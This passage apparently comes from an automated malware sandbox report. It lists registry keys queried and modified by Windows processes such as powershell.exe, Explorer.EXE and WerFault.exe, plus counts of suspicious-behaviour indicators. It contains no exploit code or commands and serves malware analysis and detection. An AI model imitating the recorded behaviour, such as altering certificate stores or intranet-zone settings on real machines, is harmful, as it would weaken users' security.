\REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.EXEpowershell.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE -
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEbackgroundTaskHost.exesihost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Cifrado del dispositivo" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000000000000010004170704461746100400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000016000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "Sistema" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "Conexión de RemoteApp y Escritorio" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Opciones de Internet" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Reconocimiento de voz" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Administración del color" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" backgroundTaskHost.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Administrador de credenciales" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recuperación" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Opciones de indización" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Firewall de Windows Defender" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e00000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\MuiCache backgroundTaskHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Programas predeterminados" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\ImmutableMuiCache\Strings\63C768CF\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Teléfono y módem" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010005573657273003c0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000055007300650072007300000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEsvchost.exepowershell.exepid process 408 powershell.exe 408 powershell.exe 3624 powershell.exe 3624 powershell.exe 3084 powershell.exe 3084 powershell.exe 1688 powershell.EXE 1688 powershell.EXE 1688 powershell.EXE 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 2824 powershell.EXE 2824 powershell.EXE 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3264 svchost.exe 3264 svchost.exe 3264 svchost.exe 3264 svchost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 4448 powershell.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 4448 powershell.exe 4448 powershell.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe 4448 powershell.exe 3720 dllhost.exe 3720 dllhost.exe 3720 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
